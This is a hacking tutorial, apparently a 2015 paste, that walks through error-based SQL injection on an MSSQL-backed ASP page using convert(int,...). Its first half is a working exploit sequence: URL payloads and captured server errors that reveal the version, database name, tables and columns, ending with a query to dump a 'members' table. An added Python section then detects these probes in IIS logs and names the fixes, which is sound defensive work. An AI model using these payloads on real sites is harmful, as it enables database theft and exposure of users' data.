Kyfx

MSSQL Injection Using Convert

Jul 25th, 2015
We have a target; let's check whether it is vulnerable to injection. We request the URL with a single quote (') appended to the end of the target parameter.
http://www.Vuln-Site.com/authorprofile.asp?id=46'
It gives us an error:

ERROR:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string ''.
/authorprofile.asp, line 10

Our target site is vulnerable. Because we are injecting with the convert attack, we do not need to count the total number of columns; we execute our commands directly through convert. (convert(int, ...) fails on any non-numeric value, and the conversion error echoes that value back to us.)
Let's check the version.
http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,@@version)--
After executing the query we get the version.

Here is the version: Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) ' to data type int.
/authorprofile.asp, line 10

Now let's check the current database name.
http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,db_name())--
And we have the current database name.

This is the current database name: museindia
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'museindia' to data type int.
/authorprofile.asp, line 10

Now that we have the version and the database name, let's move on to getting the tables.
This is our query for getting the tables:
http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 table_name from information_schema.tables))--+
After executing the query we have the first table name.

Table name: about
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'about' to data type int.
/authorprofile.asp, line 10

To get the other tables from the database, we add our previous table names, each enclosed in single quotes, inside the brackets of a NOT IN clause.
For example:
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('OUR_PREVIOUS_TABLE_NAME_1','OUR_PREVIOUS_TABLE_NAME_2')))--+
So let's check the other tables in the database.
http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('about')))--+
And we have the next table name.

Next table name: aucon
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'aucon' to data type int.
/authorprofile.asp, line 10

In this way we keep getting the other tables until we reach the required table.
Here we got the table name: members
Now let's get the column names from this table.
http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='members'))--+
We have the first column name.

This is the first column name: memberid
Let's get the other columns the same way we got the other tables from the database.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='members' and column_name not in ('memberid')))--+
After getting the column names, the final part is extracting data from the columns.
This will be our final query!
http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 OUR_COLUMN_NAME_HERE from OUR_TABLE_NAME_HERE))--+
This query will print the data from the column on the web page.
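The whole sequence above, from the single-quote probe through the version, database, table and column lookups, leaves a very recognisable trail in the web server's access log, and every step depends on the server returning the raw provider error to the client. The following Python is an added example, not part of the original paste, that scans IIS W3C-format access-log lines for the hallmarks of this convert-based technique. The log lines, field layout, client addresses and timestamps are all constructed for the example; the signatures are taken from the queries shown in the write-up.

```python
"""Detect error-based (convert) SQL injection probes in IIS W3C access logs."""
import re
from urllib.parse import unquote_plus

# Constructed sample log in W3C format with the fields:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2015-07-25 10:01:02 203.0.113.7 GET /authorprofile.asp id=46 200
2015-07-25 10:01:09 203.0.113.7 GET /authorprofile.asp id=46' 500
2015-07-25 10:01:15 203.0.113.7 GET /authorprofile.asp id=46+and+1=convert(int,@@version)-- 500
2015-07-25 10:01:21 203.0.113.7 GET /authorprofile.asp id=46+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--+ 500
2015-07-25 10:01:30 203.0.113.7 GET /authorprofile.asp id=46+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name%3D'members'))--+ 500
2015-07-25 10:02:00 198.51.100.4 GET /search.asp q=convert+my+file 200
"""

FIELDS = ["date", "time", "ip", "method", "stem", "query", "status"]

# Signatures of the technique in the write-up: a CONVERT(int, ...) forced to
# fail, wrapped around a metadata lookup, stepped with TOP 1 / NOT IN, and
# closed with a comment terminator.
CONVERT_PROBE = re.compile(r"\bconvert\s*\(\s*int\s*,", re.I)
METADATA_LOOKUP = re.compile(
    r"@@version|\bdb_name\s*\(|information_schema\.(tables|columns)", re.I)
ENUM_STEP = re.compile(r"\btop\s+1\b|\bnot\s+in\s*\(", re.I)
COMMENT_TERMINATOR = re.compile(r"--\s*$")


def parse_log(text):
    """Parse W3C log lines into dicts; skip directives and malformed lines."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != len(FIELDS):
            continue
        rec = dict(zip(FIELDS, parts))
        rec["status"] = int(rec["status"])
        # IIS stores the query as received; decode once so '+' and %XX match.
        rec["decoded"] = unquote_plus(rec["query"])
        records.append(rec)
    return records


def classify(rec):
    """Return the reasons a request looks like an error-based probe (empty if clean)."""
    q = rec["decoded"]
    reasons = []
    if CONVERT_PROBE.search(q):
        reasons.append("convert(int,...) type-coercion probe")
        if METADATA_LOOKUP.search(q):
            reasons.append("reads server/schema metadata")
        if ENUM_STEP.search(q):
            reasons.append("row-by-row enumeration (top 1 / not in)")
        if COMMENT_TERMINATOR.search(q):
            reasons.append("comment terminator truncates original query")
    # A lone quote that produces a 5xx is the first probe shown in the write-up.
    if q.count("'") % 2 == 1 and rec["status"] >= 500:
        reasons.append("unbalanced quote with server error")
    return reasons


def scan(text):
    """Return the flagged records, each with its reasons attached."""
    findings = []
    for rec in parse_log(text):
        reasons = classify(rec)
        if reasons:
            findings.append({**rec, "reasons": reasons})
    return findings


def probes_per_ip(findings):
    """Count flagged requests per client; a climbing count is enumeration in progress."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(h["time"], h["ip"], h["stem"], "|", "; ".join(h["reasons"]))
    print(probes_per_ip(hits))
```

Decoding the query string once before matching matters: the payloads arrive with `+` and `%3D` in place of spaces and `=`, so a pattern applied to the raw field would miss them. The "convert my file" search request is deliberately included to show that the signature requires the `convert(int,` call shape, not the bare word. Detection like this is a backstop; the technique only works at all because the page concatenates the `id` parameter into the SQL string and returns the ODBC provider's error text to the browser, so the fixes that remove the class of problem are a parameterised query for `id` and a generic error page in place of the raw provider message.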